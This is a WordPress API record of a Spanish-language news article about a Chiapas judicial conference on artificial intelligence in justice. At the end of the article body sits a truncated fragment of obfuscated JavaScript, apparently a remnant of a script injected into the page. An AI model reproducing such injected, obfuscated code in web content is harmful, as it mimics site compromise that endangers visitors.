{"id":20576,"date":"2025-02-25T04:48:48","date_gmt":"2025-02-25T04:48:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20576"},"modified":"2025-02-25T04:48:49","modified_gmt":"2025-02-25T04:48:49","slug":"reafirma-poder-judicial-su-compromiso-con-la-capacitacion-y-actualizacion-en-beneficio-de-una-justicia-mas-humanista-moreno-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20576","title":{"rendered":"Reafirma Poder Judicial su compromiso con la capacitaci\u00f3n y actualizaci\u00f3n en beneficio de una justicia m\u00e1s humanista: Moreno Guill\u00e9n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0066-1024x681.jpg\" alt=\"\" class=\"wp-image-20577\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0066-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0066-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0066-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0066-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250224-WA0066.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Presenta Poder Judicial conferencia sobre Los Retos de la Inteligencia Artificial en la Impartici\u00f3n de Justicia.<\/li>\n<\/ul>\n\n\n\n<p>24 de febrero del 2025. El Poder Judicial del Estado, con la firme convicci\u00f3n de que la capacitaci\u00f3n y actualizaci\u00f3n son parte fundamental para la impartici\u00f3n de una justicia m\u00e1s humanitaria, llev\u00f3 a cabo la conferencia magistral denominada Los Retos de la Inteligencia Artificial en la Impartici\u00f3n de Justicia.<\/p>\n\n\n\n<p>Al encabezar este evento, el magistrado del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, agradeci\u00f3 la presencia de todas y todos los asistentes que, desde el palacio de justicia de Tuxtla Guti\u00e9rrez, se reunieron para ser part\u00edcipes en esta ponencia que relat\u00f3 los retos digitales que se avecinan en la impartici\u00f3n de justicia.<\/p>\n\n\n\n<p>\u201cEn el Poder Judicial del Estado de Chiapas nos estamos preparando, actualiz\u00e1ndonos constantemente y reconocemos la importancia del uso adecuado de nuevas herramientas tecnol\u00f3gicas en el \u00e1mbito judicial; sin embargo, aunque las herramientas pueden ser \u00fatiles, sin duda, nunca podr\u00e1n reemplazar las buenas pr\u00e1cticas, el sentido humanista y criterio de las y los juzgadores\u201d, manifest\u00f3 Juan Carlos Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Por su parte, el especialista en Derecho Constitucional y ponente, Ar\u00edstides Rodrigo Guerrero Garc\u00eda, agradeci\u00f3 la invitaci\u00f3n a disertar este tema que retoma su importancia en la actualidad, en donde las inteligencias artificiales son parte de nuestra vida, y actualmente, se ocupan en todos los \u00e1mbitos humanos.<\/p>\n\n\n\n<p>\u201cEl reto principal es utilizar la inteligencia artificial como una herramienta de apoyo sin sustituir el criterio humano; no se trata de reemplazar personas juzgadoras o proyectistas, sino de optimizar la b\u00fasqueda de precedentes y mejorar la eficiencia judicial. Es clave observar c\u00f3mo se regulan los derechos digitales a nivel global y adaptar las mejores pr\u00e1cticas a nuestro pa\u00eds\u201d, explic\u00f3 Guerrero Garc\u00eda.<\/p>\n\n\n\n<p>Con estas actividades, el Poder Judicial del Estado reafirma su compromiso con la impartici\u00f3n de una justicia con sentido m\u00e1s humanista, accesible y actual, que avanza, se actualiza y evoluciona con la sociedad, pero siempre con la firme convicci\u00f3n de que la justicia es la paz.<\/p>\n\n\n\n<p>En esta conferencia magna estuvieron presentes magistradas y magistrados estatales y federales, juezas y jueces, directivos de esta casa de la justicia, as\u00ed como integrantes de barras, asociaciones y colegios de abogadas y abogados; las y los rectores de universidades chiapanecas, estudiantes de Derecho y p\u00fablico en general.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. Presenta Poder Judicial conferencia sobre Los Retos de la Inteligencia Artificial en la Impartici\u00f3n de Justicia. 24 de febrero del 2025. El Poder Judicial del Estado, con la firme convicci\u00f3n de que la capacitaci\u00f3n y actualizaci\u00f3n son parte fundamental para la impartici\u00f3n de una justicia m\u00e1s humanitaria, llev\u00f3 a cabo la conferencia magistral denominada &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20577,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20576","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20576","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20576"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20576\/revisions"}],"predecessor-version":[{"id":20578,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20576\/revisions\/20578"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20577"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20576"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20576"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20576"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}